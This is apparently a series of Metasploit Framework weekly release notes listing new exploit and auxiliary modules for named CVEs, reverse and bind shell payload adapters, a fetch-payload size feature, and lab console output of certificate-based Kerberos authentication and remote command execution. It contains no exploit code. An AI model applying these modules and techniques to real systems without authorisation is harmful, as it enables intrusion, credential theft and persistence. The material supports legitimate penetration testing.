ThinManager Path Traversal (CVE-2023-27855) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20138 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload
AttackerKB reference: CVE-2023-2917

Description: Adds an auxiliary module that targets CVE-2023-27855, a path traversal vulnerability in ThinManager <= v13.0.1 to upload an arbitrary file to the target system as SYSTEM.

ThinManager Path Traversal (CVE-2023-2917) Arbitrary File Upload

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20141 contributed by h4x-x0r
Path: admin/networking/thinmanager_traversal_upload2
AttackerKB reference: CVE-2023-2917

Description: Adds a module targeting CVE-2023-2917, a path traversal vulnerability in ThinManager <= v13.1.0, to upload an arbitrary file as system.

ThinManager Path Traversal (CVE-2023-27856) Arbitrary File Download

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20139 contributed by h4x-x0r
Path: gather/thinmanager_traversal_download
AttackerKB reference: CVE-2023-27856

Description: Adds an auxiliary module targeting CVE-2023-27856, a path traversal vulnerability in ThinManager <= v13.0.1, to download an arbitrary file from the target system.

udev persistence

Author: Julien Voisin
Type: Exploit
Pull request: #19472 contributed by jvoisin
Path: linux/local/udev_persistence

Description: This adds a module for udev persistence for Linux targets. The module requires root access because it creates udev rules. It will create a rule under the directory /lib/udev/rules./ and a malicious binary containing the payload. Successful exploitation requires the presence of the at binary on the system.

Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution

Authors: CERT-EU, Piotr Bazydlo, Sonny Macdonald, and remmons-r7
Type: Exploit
Pull request: #20265 contributed by remmons-r7
Path: multi/http/ivanti_epmm_rce_cve_2025_4427_4428
AttackerKB reference: CVE-2025-4428

Description: Adds a module chaining CVE-2025-4427 and CVE-2025-4428 an authentication flaw allowing unauthenticated access to an administrator web API endpoint allowing for code execution via expression language injection on many versions of MobileIron Core (rebranded as Ivanti EPMM).

PHP Exec, PHP Command Shell, Bind TCP (via Perl)

Authors: Samy samy@samy.pl, Spencer McIntyre, cazz bmc@shmoo.com, and msutovsky-r7
Type: Payload (Adapter)
Pull request: #19976 contributed by msutovsky-r7

Description: This enables creation of PHP payloads wrapped around bash / sh commands.

This adapter adds the following payloads:

• cmd/unix/php/bind_perl
• cmd/unix/php/bind_perl_ipv6
• cmd/unix/php/bind_php
• cmd/unix/php/bind_php_ipv6
• cmd/unix/php/download_exec
• cmd/unix/php/exec
• cmd/unix/php/meterpreter/bind_tcp
• cmd/unix/php/meterpreter/bind_tcp_ipv6
• cmd/unix/php/meterpreter/bind_tcp_ipv6_uuid
• cmd/unix/php/meterpreter/bind_tcp_uuid
• cmd/unix/php/meterpreter/reverse_tcp
• cmd/unix/php/meterpreter/reverse_tcp_uuid
• cmd/unix/php/meterpreter_reverse_tcp
• cmd/unix/php/reverse_perl
• cmd/unix/php/reverse_php
• cmd/unix/php/shell_findsock

Enhancements and features (3)

• #19900 from jvoisin - Updates multiple modules notes to now includes additional AKA (Also Known As) references for EquationGroup codenames.
• #20263 from cdelafuente-r7 - Updates Metasploit to register VulnAttempts for both Exploit and Auxiliary modules.
• #20277 from adfoster-r7 - Add support for Ruby 3.2.8.

Bugs fixed (7)

• #20218 from jheysel-r7 - Fixes an issue in the web crawler's canonicalize method, which previously resulted in incorrect URIs being returned.
• #20246 from bcoles - Fixes an issue within msfvenom when using zutto_dekiru encoder on a raw payload.
• #20258 from zeroSteiner - Updates the datastore options in auxiliary/admin/ldap/shadow_credentials to reference the new LDAP datastore names.
• #20260 from zeroSteiner - Updates the auxiliary/admin/ldap/change_password module to use the new LDAP datastore options.
• #20273 from JohannesLks - This fixes multiple issues in the post/windows/manage/remove_host module that would occur when a line had multiple names on it or used tab characters instead of spaces.
• #20275 from msutovsky-r7 - This fixes a bug in the auxiliary/scanner/sap/sap_router_info_request module what would cause it to crash when a corrupted packet was received.
• #20281 from JohannesLks - This fixes an issue in the post/windows/manage/resolve_host module that would occur if the system wasn't installed to C:\.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.66...6.4.68
• Full diff 6.4.66...6.4.68

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

The internet is a series of Tube [SOCKS]

Metasploit has supported SOCKS proxies for years now, being able to both act as both a client (by setting the Proxies datastore option) and a server (by running the auxiliary/server/socks_proxy module). While Metasploit has supported both SOCKS versions 4a and 5, there became some ambiguity in regards to how Domain Name System (DNS) requests are made by Metasploit through these versions. Both versions 4a and 5 notably enable clients to make connections to hosts identified by hostnames leading to the DNS resolution to take place on the SOCKS server. Whether or not the SOCKS client chooses to resolve the hostname to an address itself or to use the server is an implementation detail that is inconsistent among many pieces of software.

In the case of Metasploit, the framework opted to handle the DNS resolution itself. This was to ensure consistent behavior of running a module with and without a proxy when the target hostname resolved to multiple IP addresses. Many years ago, when Metasploit shifted focus to assessing targets in bulk, we decided that if a hostname was specified as a target by a user that mapped to multiple IP addresses, the module should be run for each IP address. This behavior is mostly intended for modules targeting web servers and can be seen by running the auxiliary/scanner/http/http_version module with a target behind a CDN such as cloudfront (it’s pretty easy to guess a suitable example here).

This did however introduce a problem for users that intended to use Metasploit as a SOCKS proxy client by setting the Proxies datastore option because Metasploit was performing the DNS resolution instead of passing the hostname to the proxy server as the user might expect. To explicitly facilitate what is probably the expected behavior of using the proxy server for name resolution, Metasploit added the unofficial SOCKS5H scheme used by cURL and other clients. The convention here being that if SOCKS5H is used, that the proxy server should be used for name resolution. Now in this case, Metasploit users can leverage the resolution capabilities of the SOCKS5 server, however that may be implemented, to initiate their connection.

To use this new capability, simply specify the server in the Proxies option as socks5h://192.0.2.0:1080 where 192.0.2.0 is the target SOCKS5 server.

At this time, Metasploit does not currently have client support for the older SOCKS4a version. If this is something that would interest you, please let us know in our ticket.

New module content (2)

WordPress Depicter Plugin SQL Injection (CVE-2025-2011)

Authors: Muhamad Visat and Valentin Lobstein
Type: Auxiliary
Pull request: #20185 contributed by Chocapikk
Path: gather/wp_depicter_sqli_cve_2025_2011
AttackerKB reference: CVE-2025-2011

Description: This adds a module for exploiting CVE-2025-2011 which is an unauthenticated SQL injection vulnerability in the "Slider & Popup Builder" plugin versions <= 3.6.1.

Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization

Authors: H00die Gr3y and Huntress Team
Type: Exploit
Pull request: #20096 contributed by h00die-gr3y
Path: windows/http/gladinet_viewstate_deserialization_cve_2025_30406
AttackerKB reference: CVE-2025-30406

Description: This adds an exploit module for Gladinet CentreStack/Triofox, the vulnerability, an unsafe deserialization allows execution of arbitrary commands.

Enhancements and features (2)

• #20147 from zeroSteiner - This adds support for the SOCKS5H protocol, allowing DNS resolution through a SOCKS5 proxy.
• #20180 from smashery - This adds a warning to PowerShell use when an impersonation token is active.

Bugs fixed (3)

• #20257 from cgranleese-r7 - Fixes an issue where the report_note deprecation message calling method incorrectly.
• #20261 from bwatters-r7 - This updates the vmware_vcenter_vmdir_auth_bypass module and accompanying documentation to refer to the new datastore option name.

Documentation added (1)

• #20255 from arpitjain099 - This fixes multiple typos in various pages of documentation.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.65...6.4.66
• Full diff 6.4.65...6.4.66

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Making Metasploit faster

This week's wrap-up includes many new modules, but notably, we've upgraded Metasploit loading. Thanks to bcoles, the bootup performance when searching for a module has been increased in #20166. Also, we've reduced Metasploit startup time - in #20155.

New module content (6)

Gather Ticket Granting Service (TGS) tickets for User Service Principal Names (SPN)

Authors: Alberto Solino and smashery
Type: Auxiliary
Pull request: #20175 contributed by smashery
Path: gather/kerberoast

Description: This adds a native Metasploit module for performing Kerberoast attacks. With the native module, users will no longer need to have Python or additional Python libraries in order to leverage the attack technique.

Ivanti Connect Secure Unauthenticated Remote Code Execution via Stack-based Buffer Overflow

Authors: Christophe De La Fuente and Stephen Fewer
Type: Exploit
Pull request: #20112 contributed by cdelafuente-r7
Path: linux/http/ivanti_connect_secure_stack_overflow_rce_cve_2025_22457
AttackerKB reference: CVE-2025-22457

Description: Adds an exploit module targeting CVE-2025-22457, a Stack-based Buffer Overflow vulnerability in Ivanti Connect Secure 22.7R2.5 and earlier.

Clinic's Patient Management System 1.0 - Unauthenticated RCE

Authors: Ashish Kumar and msutovsky-r7
Type: Exploit
Pull request: #20177 contributed by msutovsky-r7
Path: multi/http/clinic_pms_sqli_to_rce
AttackerKB reference: CVE-2025-3096

Description: Clinic Patient's Management System contains SQL injection vulnerability in login section. This module uses the vulnerability (CVE-2025-3096) to gain unauthorized access to the application. As lateral movement, it uses another vulnerability (CVE-2022-2297) to gain remote code execution.

Invision Community 5.0.6 customCss RCE

Authors: Egidio Romano (EgiX) and Valentin Lobstein
Type: Exploit
Pull request: #20214 contributed by Chocapikk
Path: multi/http/invision_customcss_rce
AttackerKB reference: CVE-2025-47916

Description: This adds a new exploit module for Invision Community versions up to and including 5.0.6, which is vulnerable to a remote-code injection in the theme editor’s customCss endpoint CVE-2025-47916. The module leverages the malformed {expression="…"} construct to evaluate arbitrary PHP expressions and supports both in-memory PHP payloads and direct system command execution.

Nextcloud Workflows Remote Code Execution

Authors: Armend Gashi, Enis Maholli, arianitisufi, and whotwagner
Type: Exploit
Pull request: #20020 contributed by whotwagner
Path: unix/webapp/nextcloud_workflows_rce
AttackerKB reference: CVE-2023-26482

Description: This adds a module for Nextcloud Workflow (CVE-2023-26482). Exploitation requires a set of valid credentials. The Nextcloud needs to have Workflow external script installed and enabled.

Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)

Authors: Michael Heinzl and SSD Secure Disclosure
Type: Exploit
Pull request: #20188 contributed by h4x-x0r
Path: windows/http/magicinfo_traversal
AttackerKB reference: CVE-2024-7399

Description: This adds a module for CVE-2024-7399 - arbitrary file write as system authority. The module drops a shell by exploiting this vulnerability, allowing remote code execution. The application communicates on TCP port 7001 for HTTP and TCP port 7002 for HTTPS.

Enhancements and features (3)

• #20155 from bcoles - This improves Metasploit reducing startup time.
• #20175 from smashery - This adds a native Metasploit module for performing Kerberoast attacks. With the native module, users will no longer need to have Python or additional Python libraries in order to leverage the attack technique.
• #20176 from smashery - This updates the ASREP roasting module (auxiliary/gather/asrep) to store the hashes in the database.

Bugs fixed (4)

• #20166 from bcoles - Improves the bootup performance of msfconsole when searching for module platform classes.
• #20179 from adfoster-r7 - This bumps the version of Metasploit Payloads to include a fix for the Java Meterpreter's symlink handling on Windows.
• #20194 from adfoster-r7 - Fixes a bug in the thinkphp RCE module that opted it out of auto-exploitation in Metasploit Pro.
• #20207 from zeroSteiner - This adds a quick fix for the new auxiliary/gather/kerberoast module to ensure that the KrbCacheMode datastore option is used. This enables the user to instruct whether or not they want the module to use cached credentials or not.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.64...6.4.65
• Full diff 6.4.64...6.4.65

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New modules for everyone

This week’s release is packed with new module content. We have RCE modules for Car Rental System 1.0, Wordpress plugins SureTriggers, User Registration and Membership. We also have a persistence module for LINQPad software and an auxiliary module for POWERCOM UPSMON PRO. We have also added support for 32-bit architectures to our execute-assembly post module, which now supports injection of both 64-bit and 32-bit .NET assembly binaries.

New module content (5)

POWERCOM UPSMON PRO Path Traversal (CVE-2022-38120) and Credential Harvester (CVE-2022-38121)

Author: Michael Heinzl
Type: Auxiliary
Pull request: #20123 contributed by h4x-x0r
Path: gather/upsmon_traversal
AttackerKB reference: CVE-2022-38121

Description: This adds an auxiliary module for two vulnerabilities in POWERCOM UPSMON PRO: path traversal and credential harvesting. The first vulnerability allows users to traverse the path in URI and read arbitrary files with respect to privileges of a given user account. The second vulnerability allows access to sensitive credentials for UPSMON as they are stored in plaintext in a readable file.

Car Rental System 1.0 File Upload RCE (Authenticated)

Author: Aaryan Golatkar
Type: Exploit
Pull request: #20026 contributed by aaryan-11-x
Path: multi/http/carrental_fileupload_rce
AttackerKB reference: CVE-2024-57487

Description: This adds a module for a file upload vulnerability in Car Rental System 1.0. It requires administrator credentials to exploit.

WordPress SureTriggers Auth Bypass and RCE

Authors: Khaled Alenazi (Nxploited), Michael Mazzolini (mikemyers), and Valentin Lobstein
Type: Exploit
Pull request: #20146 contributed by Chocapikk
Path: multi/http/wp_suretriggers_auth_bypass
AttackerKB reference: CVE-2025-3102

Description: Adds a new exploit module for the WordPress SureTriggers plugin (≤ 1.0.78) that abuses CVE-2025-3102, an unauthenticated REST endpoint to create an administrative user and achieve remote code execution.

WP User Registration and Membership Unauthenticated Privilege Escalation (CVE-2025-2563)

Authors: Valentin Lobstein and wesley (wcraft)
Type: Exploit
Pull request: #20159 contributed by Chocapikk
Path: multi/http/wp_user_registration_membership_escalation
AttackerKB reference: CVE-2025-2563

Description: This adds a module for a privilege escalation vulnerability in the User Registration and Membership plugin for Wordpress. It allows creating new users with administrator privileges.

LINQPad Deserialization Exploit

Authors: James Williams and msutovsky-r7 martin_sutovsky@rapid7.com
Type: Exploit
Pull request: #19777 contributed by msutovsky-r7
Path: windows/local/linqpad_deserialization_persistence
AttackerKB reference: CVE-2024-53326

Description: Adds a module to install persistence relying on CVE-2024-53326, a .NET deserialization vulnerability in the startup of Linqpad versions prior to 5.52.

Enhancements and features (3)

• #20098 from smashery - Adds support for 32-bit execute-assembly, allowing injection of 64-bit or 32-bit .NET assembly.
• #20126 from bcoles - This adds a Linux post-exploitation method to check Yama's ptrace_scope setting. It removes a round trip required to obtain the scope value making modules that require knowing it to run slightly faster.
• #20173 from adfoster-r7 - Updates the web crawling modules to support HTTP logging.

Bugs fixed (8)

• #20010 from lafried - This fixes missing Powershell signature, when SSH is trying to identify the platform.
• #20111 from cdelafuente-r7 - Fixes an issue that prevented failed exploit attempts to be registered in the database correctly.
• #20118 from zeroSteiner - This fixes the target option for smb_to_ldap module. The option RELAY_TARGETS is now outdated, RHOSTS should be used instead.
• #20120 from bcoles - This fixes typos across many Windows post-exploit modules and adds missing metadata.
• #20128 from bcoles - This fixes an IP address assignment in the auxiliary/bnat/bnat_router module.
• #20142 from L-codes - Fixes a crash when running unknown commands in msfconsole when using specific versions of Ruby and bundler.
• #20156 from bcoles - This fix typos and rubocop violations inside the post modules.
• #20181 from bwatters-r7 - This fixes an issue in Metasploit's Wordpress login functionality that would cause it to fail for certain target configurations.

Documentation added (1)

• #20151 from adfoster-r7 - Updates the Wiki to include the latest available download links.

You can always find more documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.62...6.4.64
• Full diff 6.4.62...6.4.64

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

New Toys and New Techniques

This release features a new OPNSense login scanner, a module targeting the Sante PACS path traversal vulnerability, an additional method for stealing Network Access Account credentials via SMB to HTTP relay, and the Erlang/OTP SSH exploit everyone was excited about.

New module content (4)

Sante PACS Server Path Traversal (CVE-2025-2264)

Authors: Michael Heinzl and Tenable
Type: Auxiliary
Pull request: #20124 contributed by h4x-x0r
Path: gather/pacsserver_traversal
AttackerKB reference: CVE-2025-2264

Description: This adds an auxiliary module for CVE-2025-2264. The vulnerability is present in Sante PACS Server and allows an attacker to perform path traversal to read arbitrary files.

OPNSense Login Scanner

Author: sjanusz-r7
Type: Auxiliary
Pull request: #19992 contributed by sjanusz-r7
Path: scanner/http/opnsense_login

Description: This adds a login scanner module for OPNSense.

SMB to HTTP relay version of Get NAA Creds

Authors: jheysel-r7, skelsec, smashery, and xpn
Type: Auxiliary
Pull request: #19952 contributed by jheysel-r7
Path: server/relay/relay_get_naa_credentials

Description: This adds a new module for obtaining NAA credentials from SCCM by authenticating through a relayed SMB connection.

Erlang OTP Pre-Auth RCE Scanner and Exploit

Authors: Horizon3 Attack Team, Martin Kristiansen, Matt Keeley, and mekhalleh (RAMELLA Sebastien)
Type: Exploit
Pull request: #20060 contributed by mekhalleh
Path: linux/ssh/ssh_erlangotp_rce
AttackerKB reference: CVE-2025-32433

Description: This adds a module which exploits CVE-2025-32433, a pre-authentication vulnerability in Erlang-based SSH servers
that allows for remote command execution as the root user. By sending crafted SSH packets, it executes a Metasploit payload to establish a session on the target system.

Enhancements and features (4)

• #20027 from e2002e - This adds support for Shodan facets.
• #20115 from cgranleese-r7 - Updates multiple HTTPS modules to support a new SSLKeyLogFile option, which facilitates decrypting messages exchanged by TLS. This can be used in diagnostic and logging tools that use this file - such as Wireshark.
• #20116 from bcoles - This adds support for .library-ms files in Windows SMB multi dropper.
• #20127 from bcoles - This improves the start up time of msfconsole when run with the default options by not sorting module options at load time.

Bugs fixed (1)

• #20148 from adfoster-r7 - This fixes an issue where SSL connections made by Metasploit would fail when the Server Name Indicator (SNI) extension was in use.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Meterpreter Extended API Clipboard Monitoring

Security is hard, and Open Source Security is a collaborative effort. This week, Metasploit released a fix for a vulnerability that was privately disclosed to us by long-time community member bcoles. The vulnerability in question impacted Metasploit users who were using the clipboard monitoring functionality contained within the extended-API Meterpreter extension (extapi). After a user enables monitoring, they would typically run clipboard_monitor_stop or clipboard_monitor_dump to retrieve information from the compromised host. The vulnerability existed in Metasploit’s handling of files that may be present in the remote hosts clipboard. When files were downloaded, they would, by default, be written to in the current working directory and would overwrite any existing files.

An attacker could leverage this by placing a malicious file into their clipboard and waiting for the Metasploit operator to download it, then execute it. As an example, an attacker may assume that the Metasploit operator is running Metasploit from the current working directory of Metasploit itself. In that case, they could have a malicious Ruby file named msfconsole in their clipboard. When the Metasploit operator dumps the contents of the remote clipboard, their local copy of msfconsole would be overwritten and then executed the next time they started Metasploit. It should be noted that the file that is written to is printed in the command’s output, but may be ignored by the user.

Now with the changes introduced in #19938, the extapi’s clipboard monitoring commands have been updated to make this significantly more difficult. Two primary changes were made. Now Metasploit will require a directory to be specified by the user of where file contents should be written to. Additionally, files will not be overwritten automatically. In order to overwrite an existing file, the user must specify the --force argument. If a file would be or is overwritten, it will be noted in the output:

meterpreter > clipboard_monitor_dump -d test_dir --force -p
Files captured at 2025-04-01 19:11:30.0503
==========================================
Remote Path : C:\Users\smcintyre\Desktop\hello-world.txt
File size   : 11 bytes
Downloading : C:\Users\smcintyre\Desktop\hello-world.txt -> /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt
Downloaded 11.00 B of 11.00 B (100.0%) : C:\Users\smcintyre\Desktop\hello-world.txt -> /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt
Completed   : Overwrote existing file /home/smcintyre/Repositories/metasploit-framework.pr/test_dir/hello-world.txt

The Metasploit team would like to thank bcoles for bringing this issue to our attention. We have assigned it CVE-2025-3095 and evaluated it with a CVSS score of 5.0 / Medium (CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P). This vulnerability was fixed in Metasploit version 6.4.60, released on April 30th, 2025.

New module content (2)

LDAP Password Disclosure

Authors: Hynek Petrak, Spencer McIntyre, Thomas Seigneuret, and Tyler Booth
Type: Auxiliary
Pull request: #20017 contributed by zeroSteiner
Path: gather/ldap_passwords

Description: This updates and renames the ldap_hashdump module to ldap_passwords, extending its functionality to extract secrets used by LAPSv1 and LAPSv2 in Active Directory environments, alongside existing LDAP implementations. It simplifies usage by unifying techniques under one module and avoids requiring users to fingerprint the server type. Associated tests were also updated to include AD-specific data using Samba as a test LDAP server.

WonderCMS Remote Code Execution

Authors: Milad "Ex3ptionaL" Karimi and msutovsky-r7
Type: Exploit
Pull request: #20081 contributed by msutovsky-r7
Path: multi/http/wondercms_rce
AttackerKB reference: CVE-2023-41425

Description: Adds a new module “exploit/multi/http/wondercms_rce” which exploits CVE-2023-41425 - a file upload vulnerability. The module will authenticate against the vulnerable WonderCMS instance using a given password and then creates a zip file with a malicious PHP file. The module then uploads a zip file, which gets automatically parsed into /themes directory and executed by the application.

Enhancements and features (1)

• #20110 from bcoles - Improves code quality, metadata, and fixes some edge-case bugs within the modules/post/osx modules.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.60...6.4.61
• Full diff 6.4.60...6.4.61

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

AD CS workflow improvement with new PKCS12 features

Given the increasing popularity of AD CS misconfiguration exploitation in recent years, Metasploit has been consistently improving its capabilities in this area. This week’s release introduces a new certs command to the msfconsole, enabling users to manage PKCS12 certificates stored in the database, similar to the klist command. The certs command provides functionalities such as listing, searching, activating, deactivating, exporting, and deleting certificates.

• Available options:

msf6 auxiliary(scanner/smb/smb_login) > certs --help
List Pkcs12 certificate bundles in the database
Usage: certs [options] [username[@domain_upn_format]]


OPTIONS:

    -a, --activate    Activates *all* matching pkcs12 entries
    -A, --deactivate  Deactivates *all* matching pkcs12 entries
    -d, --delete      Delete *all* matching pkcs12 entries
    -e, --export      The file path where to export the matching pkcs12 entry
    -h, --help        Help banner
    -i, --index       Pkcs12 entry ID(s) to search for, e.g. `-i 1` or `-i 1,2,3` or `-i 1 -i 2 -i 3`
    -v, --verbose     Verbose output

• Example output

msf6 auxiliary(admin/dcerpc/icpr_cert) > certs
Pkcs12
======
id  username       realm         subject    issuer                                              ADCS CA                   ADCS Template  status
--  --------       -----         -------    ------                                              -------                   -------------  ------
1   administrator  mydomi.local  /CN=muser  /DC=local/DC=pro/DC=ad/CN=mssrv-dc-mydomi.local-CA  mssrv-dc-mydomi.local-CA  ESC1           active

Additionally, it automates PKCS12 authentication via the pkinit protocol when the kerberos option is set for authentication and no Kerberos tickets are found in the cache. This automation allows the framework to transparently utilize stored certificates to acquire Kerberos tickets, streamlining the authentication process for modules supporting Kerberos and Schannel protocols. Any modules that support these authentication protocols can benefit from this, as long as a suitable certificate is present in the database.

Here is an example with the scanner/winrm/winrm_cmd module. This shows how the Kerberos tickets are automatically retrieved using a PKCS12 stored in the database (see the output of the certs command above):

msf6 auxiliary(admin/dcerpc/icpr_cert) > klist
Kerberos Cache
==============
No tickets

msf6 auxiliary(scanner/winrm/winrm_cmd) > run verbose=true RHOSTS=10.100.32.94 Winrm::Auth=kerberos Winrm::Rhostname=mspro-dc username=administrator domain=mydomi.local DomainControllerRhost=10.100.32.94 cmd=whoami
[*] Using stored certificate for administrator@mydomi.local
[+] 10.100.32.94:88 - Received a valid TGT-Response
[*] 10.100.32.94:5985     - TGT MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241218141549_default_10.100.32.94_mit.kerberos.cca_125955.bin
[+] 10.100.32.94:88 - Received a valid TGS-Response
[*] 10.100.32.94:5985     - TGS MIT Credential Cache ticket saved to /home/n00tmeg/.msf4/loot/20241218141549_default_10.100.32.94_mit.kerberos.cca_751667.bin
[+] 10.100.32.94:88 - Received a valid delegation TGS-Response
[+] 10.100.32.94:88 - Received AP-REQ. Extracting session key...
ad\administrator
[+] Results saved to /home/n00tmeg/.msf4/loot/20241218141553_default_10.100.32.94_winrm.cmd_result_401191.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

New module content (1)

BentoML's runner server RCE

Authors: SeaWind and Takahiro Yokoyama
Type: Exploit
Pull request: #20046 contributed by Takahiro-Yoko
Path: linux/http/bentoml_runner_server_rce_cve_2025_32375
AttackerKB reference: CVE-2025-32375

Description: This adds an exploit module for an insecure deserialization in BentoML's runner server which leads to unauthenticated RCE. Versions prior to 1.4.8 but after 1.0.0a1 are affected.

Enhanced modules (2)

Modules which have either been enhanced, or renamed:

• #20044 from jheysel-r7 - Adds a target to the service_permissions module supporting CVE-2025-21293, allowing a lower privileged user to add a DLL entry to HKLM\System\CurrentControlSet\Services\Dnscache\ and coerce execution of the DLL as system.
• #20052 from bcoles - Moves the module exploits/dialup/multi/login/manyargs to exploits/solaris/dialup/manyargs.

Enhancements and features (11)

• #19760 from cdelafuente-r7 - This introduces a new certs command that allows users to manage and display PKCS12 certificates stored in the credentials database, with options for searching, exporting, activating, and deleting certificates. It also enables automatic PKCS12-based Kerberos (and Schannel) authentication through PKINIT when no Kerberos ticket is cached, streamlining TGT acquisition using existing certificates. This enhances both usability and flexibility when working with certificate-based authentication workflows.
• #20028 from jheysel-r7 - This change modifies existing pgAdmin modules by replacing some functionalities with new library for pgAdmin.
• #20049 from bcoles - Improves the check method metadata for modules/exploits/mainframe/ftp/ftp_jcl_creds.
• #20052 from bcoles - Moves the module exploits/dialup/multi/login/manyargs to exploits/solaris/dialup/manyargs.
• #20057 from bcoles - Improves the code quality of the example modules included in Metasploit.
• #20059 from bcoles - Improves the code quality of multiple payload modules.
• #20065 from bcoles - Improves the metadata and code quality for the exploits/hpux/lpd/cleanup_exec module.
• #20066 from bcoles - Enhances the code quality of multiple payloads/singles modules, and fixes nested method definitions in 6 pingback modules.
• #20068 from bcoles - Improves the exploits/solaris/sunrpc/sadmind_adm_build_path and exploits/solaris/sunrpc/sadmind_exec modules to have check methods, improved metadata, and code quality.
• #20069 from sjanusz-r7 - Allow overwriting reported module name within the report_vuln API.
• #20077 from adfoster-r7 - Update haraka module to work with newer Python 3.12 and above.

Bugs fixed (3)

• #20051 from bcoles - Fixes out of date metadata for the exploits/dialup/multi/login/manyargs module, and fixes a logic bug code when handling bad characters.
• #20063 from bcoles - Updates Ruby pingback payloads to correctly close the opened socket after use.
• #20064 from bcoles - Fixes IPv6 support in the cmd/unix/reverse_php_ssl payload.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.4.58...6.4.59
• Full diff 6.4.58...6.4.59

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Smaller Fetch Payloads

This week, a significant enhancement was made to the already awesome fetch payload feature by our very own bwatters-r7. The improvement introduces a new option, PIPE_FETCH, which optimizes the process by serving both the payload and the command to be executed simultaneously.

This enhancement directly addresses the challenge of limited space by significantly reducing the size of the command that needs to be run. The PIPE_FETCH option works by initially generating a small command. When this compact command is executed, it fetches the actual, larger command that needs to be run. The fetched command is then directly piped into the shell, streamlining the execution process and making it feasible to use fetch payloads in scenarios where space constraints were previously a limitation.

New module content (2)

BentoML RCE

Authors: Takahiro Yokoyama and c2an1
Type: Exploit
Pull request: #20041 contributed by Takahiro-Yoko
Path: linux/http/bentoml_rce_cve_2025_27520
AttackerKB reference: CVE-2025-27520

Description: This adds a module for an unauthenticated remote code execution in BentoML (CVE-2025-27520).

Langflow AI RCE

Authors: Naveen Sunkavally (Horizon3.ai) and Takahiro Yokoyama
Type: Exploit
Pull request: #20022 contributed by Takahiro-Yoko
Path: multi/http/langflow_unauth_rce_cve_2025_3248
AttackerKB reference: CVE-2025-3248

Description: This adds a module for CVE-2025-3248, an unauthenticated RCE vulnerability that affects Langflow versions prior to 1.3.0.

Enhancements and features (4)

• #19982 from jvoisin - Updates the Linux enum_protections module to use proper names instead of executable names and add a file-based detection method.
• #20031 from bcoles - Adds metadata and improves the code quality of multiple FreeBSD exploit modules.
• #20032 from bcoles - Improves the code quality of multiple nops modules.
• #20035 from bcoles - Enhances the code quality of multiple encoder modules.

Bugs fixed (3)

• #20005 from fabpiaf - Fixes a LoadError when loading sqlite3 modules in Metasploit's Docker support.
• #20036 from bcoles - Fixes an issue with the exploit/windows/local/unquoted_service_path module that previously claimed a file upload was successful regardless of whether the file upload was successful or not.
• #20043 from adfoster-r7 - Update Open WAN-to-LAN proxy on AT&T routers error handling when an older Python version is detected.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

• Pull Requests 6.4.57...6.4.58
• Full diff 6.4.57...6.4.58

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.

Spring Exploits

This weekly release of Metasploit Framework includes new RCE exploit modules for several vulnerable applications: Appsmith, a low-code application platform which contains a misconfiguration on PostgreSQL (CVE-2024-55964); Pandora FMS, a monitoring solution, where, once gained access to the administrator panel is possible to inject commands (CVE-2024-12971); Oracle Access Manager, a SSO application containing an unauthenticated deserialization vulnerability (CVE-2021-35587); and pgAdmin Query Tool, a powerful database management tool that let attacker convert database accesses into shells (CVE-2025-2945).

New module content (5)

CrushFTP AWS4-HMAC Authentication Bypass

Authors: Outpost24 and remmons-r7
Type: Auxiliary
Pull request: #20000 contributed by remmons-r7
Path: gather/crushftp_authbypass_cve_2025_2825
AttackerKB reference: CVE-2025-2825

